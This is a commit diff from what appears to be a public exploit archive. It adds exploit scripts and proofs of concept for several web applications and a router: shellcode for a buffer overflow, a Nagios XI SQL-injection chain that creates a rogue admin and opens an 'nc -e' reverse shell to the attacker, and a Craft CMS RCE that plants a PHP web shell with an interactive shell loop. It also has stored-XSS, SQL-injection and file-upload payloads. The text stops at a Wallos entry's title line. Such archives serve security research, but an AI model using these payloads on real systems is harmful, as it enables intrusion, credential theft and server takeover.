DB: 2024-03-26

11 changes to exploits/shellcodes/ghdb LBT-T300-mini1 - Remote Buffer Overflow Nagios XI Version 2024R1.01 - SQL Injection Craft CMS 4.4.14 - Unauthenticated Remote Code Execution Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS LimeSurvey Community 5.3.32 - Stored XSS MobileShop master v1.0 - SQL Injection Vuln. SPA-CART CMS - Stored XSS Tourism Management System v2.0 - Arbitrary File Upload Wallos < 1.11.2 - File Upload RCE
2024-03-26 00:16:32 +00:00 · 2024-03-26 00:16:32 +00:00 · c9576b1787
commit c9576b1787
parent 26a991fc28
11 changed files with 841 additions and 0 deletions
--- a/exploits/linux/remote/51922.c
+++ b/exploits/linux/remote/51922.c
@ -0,0 +1,31 @@
 #include <stdio.h>
 #include <string.h>
 #define MAX_LEN 256
 #define BUFFER_OVERRUN_LENGTH 50
 #define SHELLCODE_LENGTH 32
 // NOP sled to increase the chance of successful shellcode execution
 char nop_sled[SHELLCODE_LENGTH] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
 // Shellcode to execute /bin/sh
 char shellcode[SHELLCODE_LENGTH] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
 void apply_cgi(char *vpn_client_ip) {
    char buffer[MAX_LEN];
    strncpy(buffer, vpn_client_ip, MAX_LEN);
    printf("Client IP: %s\n", buffer);
 }
 int main() {
    char input[MAX_LEN + BUFFER_OVERRUN_LENGTH] = {0};
    // Create a buffer with the malicious input
    // including the NOP sled, shellcode, and the overflow data
    int offset = strlen(nop_sled) + strlen(shellcode) - BUFFER_OVERRUN_LENGTH;
    strncpy(&input[0], nop_sled, offset);
    strncpy(&input[offset], shellcode, SHELLCODE_LENGTH);
    input[MAX_LEN + BUFFER_OVERRUN_LENGTH - 1] = '\x00';
    // Call the vulnerable function to trigger the buffer overflow
    apply_cgi(input);
    return 0;
 }
--- a/exploits/multiple/webapps/51925.py
+++ b/exploits/multiple/webapps/51925.py
@ -0,0 +1,184 @@
 # Exploit Title: NAGIOS XI SQLI
 # Google Dork: [if applicable]
 # Date: 02/26/2024
 # Exploit Author: Jarod Jaslow (MAWK) https://www.linkedin.com/in/jarod-jaslow-codename-mawk-265144201/
 # Vendor Homepage: https://www.nagios.com/changelog/#nagios-xi
 # Software Link: https://github.com/MAWK0235/CVE-2024-24401
 # Version: Nagios XI Version 2024R1.01
 # Tested on: Nagios XI Version 2024R1.01 LINUX
 # CVE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24401
 #
 import requests
 import subprocess
 import argparse
 import re
 import urllib3
 import os
 import random
 import string
 from colorama import Fore, Style
 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 def serviceLogin(user,password):
    r = requests.post(f'http://{IP}/nagiosxi/api/v1/authenticate?pretty=1',data={'username':user,'password':password,"valid_min":"5"},verify=False)
    print(f"{Fore.MAGENTA}[+] Authenticating with captured credtials to API....")
    match = re.search(r'auth_token": "(.*)"',r.text)
    if match:
        token = match.group(1)
        print(f'{Fore.MAGENTA}[+] Token: ' + token)
        r = requests.get(f'http://{IP}/nagiosxi/login.php?token={token}', verify=False)
        cookie = r.headers['Set-Cookie']
        cookie = cookie.split(',')[0]
        match = re.search(r'nagiosxi=(.*);', cookie)
        cookie = match.group(1)
        print(f"{Fore.MAGENTA}[+] Auth cookie is: " + cookie)
        return cookie
    else:
        print(f'{Fore.RED}[-] Authentication Failed..{Style.RESET_ALL}')
        exit()
 def sqlmap(IP,username,password):
    print(f'{Fore.MAGENTA}[+] Starting SQLMAP...')
    session = requests.session()
    s = session.get(f'http://{IP}/nagiosxi/index.php', verify=False)
    match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
    nsp = match.group(1)
    print(f"{Fore.MAGENTA}[+] NSP captured: " + nsp)
    data = {"nsp": nsp, "page": "auth", "debug": '', "pageopt": "login", "username": username, "password": password, "loginButton": ''}
    s = session.post(f'http://{IP}/nagiosxi/login.php', data=data)
    print(f"{Fore.MAGENTA}[+] Authenticated as User..")
    print(f"{Fore.MAGENTA}[+] Accepting license Agreement...")
    s = session.get(f'http://{IP}/nagiosxi/login.php?showlicense', verify=False)
    match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
    nsp = match.group(1)
    data = {"page": "/nagiosxi/login.php", "pageopt": "agreelicense", "nsp": nsp, "agree_license": "on"}
    session.post(f"http://{IP}/nagiosxi/login.php?showlicense", data=data)
    print(f"{Fore.MAGENTA}[+] Performing mandatory password change ARGH")
    newPass = "mawk"
    data = {"page": "/nagiosxi/login.php", "pageopt": "changepass", "nsp": nsp,"current_password": password, "password1": newPass, "password2": newPass, "reporttimesubmitbutton": ''}
    session.post(f"http://{IP}/nagiosxi/login.php?forcepasswordchange", data=data)
    s= session.get(f'http://{IP}/nagiosxi/')
    match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
    nsp = match.group(1)
    cookie = s.cookies.get('nagiosxi')
    sqlmap_command = f'sqlmap --flush-session -u "http://{IP}/nagiosxi//config/monitoringwizard.php/1*?update=1&nextstep=2&nsp={nsp}&wizard=mysqlserver" --cookie="nagiosxi={cookie}" --dump -D nagiosxi -T xi_users --drop-set-cookie --technique=ET --dbms=MySQL -p id --risk=3 --level=5 --threads=10 --batch'
    #print(sqlmap_command)
    sqlmap_command_output = subprocess.Popen(sqlmap_command,shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True )
    try:
        for line in iter(sqlmap_command_output.stdout.readline, ''):
            if "| Nagios Administrator |" in line:
                match = re.search(r"Nagios Administrator \| (.*?) \|", line)
                if match:
                    adminKey= match.group(1)
                    print(f"{Fore.MAGENTA}[+] Admin Key recovered: " + adminKey)
                    return adminKey
                else:
                    print(f"{Fore.RED}[-] Could not pull Admin Key :(....{Style.RESET_ALL}")
                    exit()
                break
        print("[-] SQLMAP capture FAILED..")
        sqlmap_command_output.terminate()
    except KeyboardInterrupt:
        print(f"{Fore.RED}[-] SQLMAP interrupted. Cleaning up...{Style.RESET_ALL}")
        sqlmap_command_output.terminate()
        sqlmap_command_output.communicate()
        exit()
 def createAdmin(IP,adminKey):
    characters = string.ascii_letters + string.digits
    random_username = ''.join(random.choice(characters) for i in range(5))
    random_password = ''.join(random.choice(characters) for i in range(5))
    data = {"username": random_username, "password": random_password, "name": random_username, "email": f"{random_username}@mail.com", "auth_level": "admin"}
    r = requests.post(f'http://{IP}/nagiosxi/api/v1/system/user?apikey={adminKey}&pretty=1', data=data, verify=False)
    if "success" in r.text:
        print(f'{Fore.MAGENTA}[+] Admin account created...')
        return random_username, random_password
    else:
        print(f'{Fore.RED}[-] Account Creation Failed!!! :(...{Style.RESET_ALL}')
        print(r.text)
        exit()
 def start_HTTP_server():
    subprocess.Popen(["python", "-m", "http.server", "8000"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
 def adminExploit(adminUsername, adminPassword, IP, LHOST,LPORT):
    print(f"{Fore.MAGENTA}[+] Conducting mandatory password change...")
    session = requests.session()
    s = session.get(f'http://{IP}/nagiosxi/index.php', verify=False)
    match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
    nsp = match.group(1)
    print(f"{Fore.MAGENTA}[+] NSP captured: " + nsp)
    data = {"nsp": nsp, "page": "auth", "debug": '', "pageopt": "login", "username": adminUsername, "password": adminPassword, "loginButton": ''}
    s = session.post(f'http://{IP}/nagiosxi/login.php', data=data)
    print(f"{Fore.MAGENTA}[+] Authenticated as admin..")
    print(f"{Fore.MAGENTA}[+] Accepting license Agreement...")
    s = session.get(f'http://{IP}/nagiosxi/login.php?showlicense', verify=False)
    match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
    nsp = match.group(1)
    data = {"page": "/nagiosxi/login.php", "pageopt": "agreelicense", "nsp": nsp, "agree_license": "on"}
    session.post(f"http://{IP}/nagiosxi/login.php?showlicense", data=data)
    print(f"{Fore.MAGENTA}[+] Performing mandatory password change ARGH")
    newAdminPass = adminUsername + adminPassword
    data = {"page": "/nagiosxi/login.php", "pageopt": "changepass","current_password": adminPassword, "nsp": nsp, "password1": newAdminPass, "password2": newAdminPass, "reporttimesubmitbutton": ''}
    session.post(f"http://{IP}/nagiosxi/login.php?forcepasswordchange", data=data)
    print(f"{Fore.MAGENTA}[+] Creating new command...")
    data = {"tfName": adminUsername, "tfCommand": f"nc -e /usr/bin/sh {LHOST} {LPORT}", "selCommandType": "1", "chbActive": "1", "cmd": "submit", "mode": "insert", "hidId": "0", "hidName": '', "hidServiceDescription": '', "hostAddress": "127.0.0.1", "exactType": "command", "type": "command", "genericType": "command"}
    session.post(f'http://{IP}/nagiosxi/includes/components/ccm/index.php?type=command&page=1', data=data)
    data = {"cmd": '', "continue": ''}
    start_HTTP_server()
    print(f"{Fore.MAGENTA}[+] Created command: " + adminUsername)
    session.post(f'http://{IP}/nagiosxi/includes/components/nagioscorecfg/applyconfig.php?cmd=confirm', data=data)
    data = {"search": adminUsername}
    s = session.post(f'http://{IP}/nagiosxi/includes/components/ccm/index.php?cmd=view&type=command&page=1', data=data)
    match = re.search(r"javascript:actionPic\('deactivate','(.*?)','", s.text)
    if match:
        commandCID = match.group(1)
        print(f"{Fore.MAGENTA}[+] Captured Command CID: " + commandCID)
        s = session.get(f"http://{IP}/nagiosxi/includes/components/ccm/?cmd=view&type=service")
        match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
        if match:
            nsp = match.group(1)
            s = session.get(f"http://{IP}/nagiosxi/includes/components/ccm/command_test.php?cmd=test&mode=test&cid={commandCID}&nsp={nsp}")
            os.system("kill -9 $(lsof -t -i:8000)")
            print(f"{Fore.RED}[+] CHECK UR LISTENER")
        else:
            print(f"{Fore.RED}[-] ERROR")
    else:
        print(f"{Fore.RED}[-] Failed to capture Command CID..{Style.RESET_ALL}")
 if __name__ == '__main__':
    ascii_art = f"""{Fore.LIGHTRED_EX}
 ███╗   ███╗ █████╗ ██╗    ██╗██╗  ██╗    ███████╗ ██████╗██████╗ ██╗██████╗ ████████╗███████╗
 ████╗ ████║██╔══██╗██║    ██║██║ ██╔╝    ██╔════╝██╔════╝██╔══██╗██║██╔══██╗╚══██╔══╝██╔════╝
 ██╔████╔██║███████║██║ █╗ ██║█████╔╝     ███████╗██║     ██████╔╝██║██████╔╝   ██║   ███████╗
 ██║╚██╔╝██║██╔══██║██║███╗██║██╔═██╗     ╚════██║██║     ██╔══██╗██║██╔═══╝    ██║   ╚════██║
 ██║ ╚═╝ ██║██║  ██║╚███╔███╔╝██║  ██╗    ███████║╚██████╗██║  ██║██║██║        ██║   ███████║
 ╚═╝     ╚═╝╚═╝  ╚═╝ ╚══╝╚══╝ ╚═╝  ╚═╝    ╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝╚═╝        ╚═╝   ╚══════╝
     {Style.RESET_ALL}
    """
    print(ascii_art)
    parser = argparse.ArgumentParser(description="AutoPwn Script for Bizness HTB machine", usage= "sudo Nagios.py <Target IP>  <LHOST> <LPORT>")
    parser.add_argument('IP' ,help= "Target IP ")
    parser.add_argument('LHOST',help= "Local host")
    parser.add_argument('LPORT' ,help= "Listening Port")
    args = parser.parse_args()
    min_required_args = 3
    if len(vars(args)) != min_required_args:
        parser.print_usage()
        exit()
    adminUsername, adminPassword = createAdmin(args.IP, sqlmap(args.IP,input(f"{Fore.MAGENTA}[+] Please insert a non-administrative username: "),input(f"{Fore.MAGENTA}[+] Please insert the password: ")))
    print(f"{Fore.MAGENTA}[+] Admin Username=" + adminUsername)
    print(f"{Fore.MAGENTA}[+] Admin Password=" + adminPassword)
    adminExploit(adminUsername, adminPassword, args.IP,args.LHOST,args.LPORT)
--- a/exploits/php/webapps/51918.py
+++ b/exploits/php/webapps/51918.py
@ -0,0 +1,128 @@
 #!/usr/bin/env python3
 #coding: utf-8
 # Exploit Title: Craft CMS unauthenticated Remote Code Execution (RCE)
 # Date: 2023-12-26
 # Version: 4.0.0-RC1 - 4.4.14
 # Vendor Homepage: https://craftcms.com/
 # Software Link: https://github.com/craftcms/cms/releases/tag/4.4.14
 # Tested on: Ubuntu 22.04.3 LTS
 # Tested on: Craft CMS 4.4.14
 # Exploit Author: Olivier Lasne
 # CVE : CVE-2023-41892
 # References :
 # https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
 # https://blog.calif.io/p/craftcms-rce
 import requests
 import sys, re
 if(len(sys.argv) < 2):
    print(f"\033[1;96mUsage:\033[0m python {sys.argv[0]} \033[1;96m<url>\033[0m")
    exit()
 HOST = sys.argv[1]
 if not re.match('^https?://.*', HOST):
    print("\033[1;31m[-]\033[0m URL should start with http or https")
    exit()
 print("\033[1;96m[+]\033[0m Executing phpinfo to extract some config infos")
 ## Execute phpinfo() and extract config info from the website
 url = HOST + '/index.php'
 content_type = {'Content-Type': 'application/x-www-form-urlencoded'}
 data = r'action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}'
 try:
    r = requests.post(url, headers=content_type, data=data)
 except:
    print(f"\033[1;31m[-]\033[0m Could not connect to {HOST}")
    exit()
 # If we succeed, we should have default phpinfo credits
 if not 'PHP Group' in r.text:
 	print(f'\033[1;31m[-]\033[0m {HOST} is not exploitable.')
 	exit()
 # Extract config value for tmp_dir and document_root
 pattern1 = r'<tr><td class="e">upload_tmp_dir<\/td><td class="v">(.*?)<\/td><td class="v">(.*?)<\/td><\/tr>'
 pattern2 = r'<tr><td class="e">\$_SERVER\[\'DOCUMENT_ROOT\'\]<\/td><td class="v">([^<]+)<\/td><\/tr>'
 tmp_dir       = re.search(pattern1, r.text, re.DOTALL).group(1)
 document_root = re.search(pattern2, r.text, re.DOTALL).group(1)
 if 'no value' in tmp_dir:
 	tmp_dir = '/tmp'
 print(f'temporary directory: {tmp_dir}')
 print(f'web server root: {document_root}')
 ## Create shell.php in tmp_dir
 data = {
    "action": "conditions/render",
    "configObject[class]": "craft\elements\conditions\ElementCondition",
    "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/etc/passwd"}}}'
 }
 files = {
    "image1": ("pwn1.msl", """<?xml version="1.0" encoding="UTF-8"?>
    <image>
    <read filename="caption:<?php @system(@$_REQUEST['cmd']); ?>"/>
    <write filename="info:DOCUMENTROOT/shell.php"/>
    </image>""".replace("DOCUMENTROOT", document_root), "text/plain")
 }
 print(f'\033[1;96m[+]\033[0m create shell.php in {tmp_dir}')
 r = requests.post(url, data=data, files=files) #, proxies={'http' : 'http://127.0.0.1:8080'}) #
 # Use the Imagick trick to move the webshell in DOCUMENT_ROOT
 data = {
    "action": "conditions/render",
    "configObject[class]": r"craft\elements\conditions\ElementCondition",
    "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:' + tmp_dir + r'/php*"}}}'
 }
 print(f'\033[1;96m[+]\033[0m trick imagick to move shell.php in {document_root}')
 r = requests.post(url, data=data) #, proxies={"http": "http://127.0.0.1:8080"})
 if r.status_code != 502:
    print("\033[1;31m[-]\033[0m Exploit failed")
    exit()
 print(f"\n\033[1;95m[+]\033[0m Webshell is deployed: {HOST}/\033[1mshell.php\033[0m?cmd=whoami")
 print(f"\033[1;95m[+]\033[0m Remember to \033[1mdelete shell.php\033[0m in \033[1m{document_root}\033[0m when you're done\n")
 print("\033[1;92m[!]\033[0m Enjoy your shell\n")
 url = HOST + '/shell.php'
 ## Pseudo Shell
 while True:
    command = input('\033[1;96m>\033[0m ')
    if command == 'exit':
        exit()
    if command == 'clear' or command == 'cls':
        print('\n' * 100)
        print('\033[H\033[3J', end='')
        continue
    data = {'cmd' : command}
    r = requests.post(url, data=data) #, proxies={"http": "http://127.0.0.1:8080"})
    # exit if we have an error
    if r.status_code != 200:
        print(f"Error: status code {r.status_code} for {url}")
        exit()
    res_command = r.text
    res_command = re.sub('^caption:', '', res_command)
    res_command = re.sub(' CAPTION.*$', '', res_command)
    print(res_command, end='')
--- a/exploits/php/webapps/51919.txt
+++ b/exploits/php/webapps/51919.txt
@ -0,0 +1,127 @@
 # Exploit Title: SPA-CART CMS - Stored XSS
 # Date: 2024-01-03
 # Exploit Author: Eren Sen
 # Vendor: SPA-Cart
 # Vendor Homepage: https://spa-cart.com/
 # Software Link: https://demo.spa-cart.com/
 # Version: [1.9.0.3]
 # CVE-ID: N/A
 # Tested on: Kali Linux / Windows 10
 # Vulnerabilities Discovered Date : 2024/01/03
 # Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability
 # Vulnerable Parameter Type: POST
 # Vulnerable Parameter: descr
 # Proof of Concept: demo.spa-cart.com/product/258
 # HTTP Request:
 POST ////admin/products/258 HTTP/2
 Host: demo.spa-cart.com
 Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx
 Content-Length: 1906
 Sec-Ch-Ua:
 Accept: */*
 Content-Type: multipart/form-data;
 boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl
 X-Requested-With: XMLHttpRequest
 Sec-Ch-Ua-Mobile: ?0
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
 Sec-Ch-Ua-Platform: ""
 Origin: https://demo.spa-cart.com
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Sec-Fetch-Dest: empty
 Referer: https://demo.spa-cart.com////admin/products/258
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="mode"
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="sku"
 SKU386
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="name"
 asdf
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="cleanurl"
 Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="avail"
 1000
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="price"
 0.00
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="list_price"
 2
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="weight"
 0.00
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="categoryid"
 42
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="categories[]"
 8
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="categories[]"
 37
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="brandid"
 4
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="status"
 1
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="keywords"
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="descr"
 <script>alert(1)</script>
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="title_tag"
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="meta_keywords"
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl
 Content-Disposition: form-data; name="meta_description"
 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl--
--- a/exploits/php/webapps/51920.txt
+++ b/exploits/php/webapps/51920.txt
@ -0,0 +1,35 @@
 # Exploit Title:Insurance Management System PHP and MySQL 1.0 - Multiple
 Stored XSS
 # Date: 2024-02-08
 # Exploit Author: Hakkı TOKLU
 # Vendor Homepage: https://www.sourcecodester.com
 # Software Link:
 https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
 # Version: 1.0
 # Tested on: Windows 11 / PHP 8.1 & XAMPP 3.3.0
 Support Ticket
 Click on Support Tickets > Generate and add payload <img src=x onerror=prompt("xss")> to Subject and Description fields, then send the request. When admin visits the Support Tickets page, XSS will be triggered.
   Example Request :
 	    POST /e-insurance/Script/user/core/new_ticket HTTP/1.1
 		Host: localhost
 		Content-Type: application/x-www-form-urlencoded
 		Content-Length: 139
 		Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15; __insuarance__logged=1; __insuarance__key=LG3LFIBJCN9DKVXKYS41
 		category=4&subject=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&description=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&submit=1
 Create Account
 Click on New Account button on login page, then fill the fields. Inject <img src=x onerror=prompt("xss")> payloads to fname, lname, city and street parameter, then click Create Account button. XSS will be triggered when admin visits Users page.
 	Example Request :
 		POST /e-insurance/Script/core/new_account HTTP/1.1
 		Host: localhost
 		Content-Type: application/x-www-form-urlencoded
 		Content-Length: 303
 		Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15
 		fname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&lname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&gender=Male&phone=5554443322&city=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&street=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&email=test1%40test.com&password=Test12345&submit=1
--- a/exploits/php/webapps/51921.txt
+++ b/exploits/php/webapps/51921.txt
@ -0,0 +1,109 @@
 + Exploit Title: MobileShop master v1.0 - SQL Injection Vuln.
 + Date: 2024-13-03
 + Exploit Author: "HAZIM ARBAŞ" from EMA Security LTD - Siber Güvenlik ve Bilişim Hizmetleri (https://emasecurity.com)
 + Vendor Homepage: https://code-projects.org/mobile-shop-in-php-css-javascript-and-mysql-free-download/
 + Software Link: https://download-media.code-projects.org/2020/04/Mobile_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip
 + Tested on: Windows 10 Pro
 + CWE: CWE-89
 + CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
 + Type: WebApps
 + Platform: PHP
 ## References:
 + https://cwe.mitre.org/data/definitions/89.html
 + https://owasp.org/Top10/A03_2021-Injection/
 ## Description:
 The MobileShop-master application is susceptible to SQL Injection through the 'id' parameter in "/MobileShop-master/Details.php". Exploiting this vulnerability could lead to severe consequences, including unauthorized access, data manipulation, and potential exploitation of other vulnerabilities within the underlying database. It is imperative to address this issue promptly to mitigate the risk of compromise and ensure the security and integrity of the application and its data.
 ## Proof of Concept:
 + Go to the Login page: "http://localhost/MobileShop-master/Login.html"
 + Fill email and password.
 + Select any product and intercept the request via Burp Suite, then send it to Repeater.
 + Change the 'id' value to any of the below payloads.
 + Send the request
 ## Payloads:
 + id=1' AND 9071=9071 AND 'EtdU'='EtdU
 + id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk
 + id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
 + Or you can write your own payloads
 ## Proof of Concept Using SqlMap:
 + Go to the Login page: "http://localhormst/MobileShop-master/Login.html"
 + Fill email and password.
 + Select any product and intercept the request via Burp Suite, then send it to Repeater.
 + Copy to File the request to a "sql.txt" file.
 + Run the following sqlmap command
 + sqlmap -r sql.txt -p id --dbs
 ```
 POST /MobileShop-master/Details.php HTTP/1.1
 Host: localhost
 Content-Length: 42
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: http://localhost
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://localhost/MobileShop-master/MobilesList.php
 Accept-Encoding: gzip, deflate, br
 Accept-Language: en-US,en;q=0.9
 Cookie: PHPSESSID=mh3mnpf51bj2q17hg8sipbltnn
 Connection: close
 id=1
 ```
 + Use sqlmap to exploit. In sqlmap, use 'id' parameter to dump the database.
 ```
 sqlmap -r sql.txt -p id --dbs
 ```
 ```
 ---
 Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9071=9071 AND 'EtdU'='EtdU
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7380 FROM (SELECT(SLEEP(5)))rlmI) AND 'blrN'='blrN
    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
 ---
 [04:17:04] [INFO] the back-end DBMS is MySQL
 web application technology: PHP 8.2.12, Apache 2.4.58
 back-end DBMS: MySQL >= 5.0 (MariaDB fork)
 [04:17:04] [INFO] fetching database names
 [04:17:05] [INFO] resumed: 'information_schema'
 [04:17:05] [INFO] resumed: '1'
 [04:17:05] [INFO] resumed: '3'
 [04:17:05] [INFO] resumed: 'admidio'
 [04:17:05] [INFO] resumed: 'calender'
 [04:17:05] [INFO] resumed: 'corregidor'
 [04:17:05] [INFO] resumed: 'gym'
 [04:17:05] [INFO] resumed: 'joomla_db'
 [04:17:05] [INFO] resumed: 'linkstack'
 [04:17:05] [INFO] resumed: 'mobileshop'
 [04:17:05] [INFO] resumed: 'mysql'
 [04:17:05] [INFO] resumed: 'nickey'
 [04:17:05] [INFO] resumed: 'performance_schema'
 [04:17:05] [INFO] resumed: 'phpmyadmin'
 [04:17:05] [INFO] resumed: 'rcms'
 [04:17:05] [INFO] resumed: 'smith'
 [04:17:05] [INFO] resumed: 'telephone'
 [04:17:05] [INFO] resumed: 'test'
 [04:17:05] [INFO] resumed: 'valente'
 ```
--- a/exploits/php/webapps/51923.txt
+++ b/exploits/php/webapps/51923.txt
@ -0,0 +1,71 @@
 # Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload
 # Google Dork: N/A
 # Exploit Author: SoSPiro
 # Date: 2024-02-18
 # Vendor Homepage: https://phpgurukul.com
 # Software Link: https://phpgurukul.com/tourism-management-system-free-download/
 # Version: 2.0
 # Tested on: Windows 10 Pro
 # Impact: Allows admin to upload all files to the web server
 # CVE : N/A
 # Exploit Description:
 The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.
 # PoC request
 POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate, br
 Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201
 Content-Length: 361
 Origin: http://localhost
 Connection: close
 Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1
 Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv
 Upgrade-Insecure-Requests: 1
 Sec-Fetch-Dest: document
 Sec-Fetch-Mode: navigate
 Sec-Fetch-Site: same-origin
 Sec-Fetch-User: ?1
 X-PwnFox-Color: red
 -----------------------------390927495111779706051786831201
 Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"
 Content-Type: text/plain
 <?php phpinfo();?>
 -----------------------------390927495111779706051786831201
 Content-Disposition: form-data; name="submit"
 -----------------------------390927495111779706051786831201--
 ===========================================================================================
 - Response -
 HTTP/1.1 200 OK
 Date: Sun, 18 Feb 2024 04:33:37 GMT
 Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev
 X-Powered-By: PHP/8.1.13
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate
 Pragma: no-cache
 Connection: close
 Content-Type: text/html; charset=UTF-8
 Content-Length: 8146
 ============================================================================================
 - File location -
 http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php
--- a/exploits/php/webapps/51924.txt
+++ b/exploits/php/webapps/51924.txt
@ -0,0 +1,76 @@
 # Exploit Title: Wallos - File Upload RCE (Authenticated)
